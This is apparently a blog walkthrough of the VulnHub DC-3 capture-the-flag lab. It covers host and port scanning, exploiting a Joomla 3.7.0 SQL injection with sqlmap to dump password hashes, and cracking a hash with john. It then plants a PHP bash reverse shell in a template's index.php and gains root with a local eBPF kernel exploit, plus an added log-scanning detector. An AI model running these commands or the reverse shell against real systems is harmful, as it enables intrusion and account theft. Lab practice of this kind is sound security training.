Penetration learning of DC-3 target


1. Lab environment

Attacker machine (Kali):

Target (DC-3): (unknown)

Target download: DC: 3.2 ~ VulnHub

2. Preparation

2.1 IP address confirmation

Command: arp-scan -l    Scan all LAN devices (IP, MAC address and vendor of every device)

arp-scan is a command-line ARP scanning tool for host discovery (it can find hidden devices on the local network). It constructs and sends ARP requests to the specified IP addresses and displays every response that comes back.
arp-scan shows all connected devices on the local network, even those behind a firewall: a firewall can block ping, but it cannot block ARP packets.

2.2 Port scanning

nmap -T4 -sV -O -A -p-
-T4 (timing/speed)  -sV (service version detection)  -O (OS detection)  -A (aggressive scan: OS detection, version detection, default scripts and traceroute)  -p- (all 65535 ports)

2.3 Website scanning

Use dirb to find the administrator login page.

2.4 Visit the web page for information

There is no SSH service, but we have found the admin login page, so we can only escalate privileges step by step.

2.5 View the website structure

We can see that the CMS is Joomla, a content management system written in PHP and backed by a MySQL database.

The three common PHP CMSs: Drupal, WordPress and Joomla.

3. Starting the penetration

1. flag1

1.1 Obtain the Joomla version with a dedicated tool

joomscan --url

Through the Wappalyzer Firefox plug-in we found that the target's CMS is Joomla, so we use the dedicated tool joomscan to scan it.
The command to install joomscan on Kali is: sudo apt-get install joomscan

The scan shows that the target's Joomla version is 3.7.0.

1.2 Vulnerability lookup

Use searchsploit to look up known vulnerabilities for Joomla 3.7.0.

searchsploit Joomla 3.7.0

This confirms that the version has an SQL injection vulnerability.

1.3 Vulnerability details

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt    View the exploit write-up

1.4 Dumping the database with sqlmap

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--dbs  enumerate the databases.  We guess the user data is in joomladb.

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

-D "joomladb" --tables  lists all tables in the joomladb database.  We found the user table.

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" -T "#__users" --columns  lists the columns of the user table in the joomladb database.

sqlmap -u "[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,name,password,username --dump -p list[fullordering]


-D "joomladb" -T "#__users" -C id,name,password,username --dump  dumps the specified columns.

We found the usernames and passwords, but the passwords are hashed.
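A defender-side addition (example code written for this page, not part of the original write-up): the injection above goes through the list[fullordering] parameter, which is easy to spot in web-server access logs. The log lines below are constructed, and legitimate Joomla values for that parameter are assumed to look like "a.name ASC".

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" log line: ip ident user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Legitimate Joomla ordering values look like "a.name ASC" (assumption for this example).
LEGIT_ORDERING = re.compile(r'^[A-Za-z_][\w.]*(\s+(ASC|DESC))?$', re.IGNORECASE)
# MySQL functions used for error-based injection, as in the sqlmap run above.
ERROR_FUNCS = re.compile(r'(updatexml|extractvalue)\s*\(', re.IGNORECASE)

def check_request(path):
    """Return a reason string if the request abuses list[fullordering], else None."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for raw_value in params.get('list[fullordering]', []):
        value = unquote_plus(raw_value).strip()  # second pass catches double-encoded payloads
        if ERROR_FUNCS.search(value):
            return 'error-based SQLi function in list[fullordering]'
        if not LEGIT_ORDERING.match(value):
            return 'unexpected list[fullordering] value'
    return None

def scan_log(lines):
    """Return (ip, timestamp, reason) for every suspicious request in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reason = check_request(m.group('path'))
        if reason:
            hits.append((m.group('ip'), m.group('ts'), reason))
    return hits

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Oct/2021:15:01:02 -0400] "GET /index.php?option=com_users&view=users&list[fullordering]=a.name+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Oct/2021:15:03:10 -0400] "GET /index.php?option=com_content&list%5Bfullordering%5D=updatexml(1%2C1%2C1) HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Oct/2021:15:04:44 -0400] "GET /templates/beez3/css/template.css HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == '__main__':
    for ip, ts, reason in scan_log(SAMPLE_LOG):
        print(f'{ip} {ts} {reason}')
```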

1.5 Password cracking

Create a new file, write the hash into it, and use john to crack it.

The cracked password is snoopy.

Log in to the admin backend.

Insert a one-line PHP reverse shell into index.php, start a listener on Kali, and visit the index page again to execute it.

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.226.128/1212 0>&1'");
?>

index.php and the uploaded scripts are in the beez3 template directory.


Check the OS version and look up the exploit database.

lsb_release -a
cat /etc/issue

Copy the exploit information to the local machine.

searchsploit ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/
cat 39772.txt


3. Privilege escalation

unzip   #Unzip the downloaded exploit archive
cd 39772
tar -xvf exploit.tar   #Unpack the exploit tarball
cd ebpf_mapfd_doubleput_exploit

./   #Run the build script to compile the exploit
./doubleput   #Run the compiled privilege-escalation binary

cd /root
cat the-flag.txt



Tags: penetration test kali

Posted on Fri, 01 Oct 2021 15:09:41 -0400 by Tr4mpldUndrfooT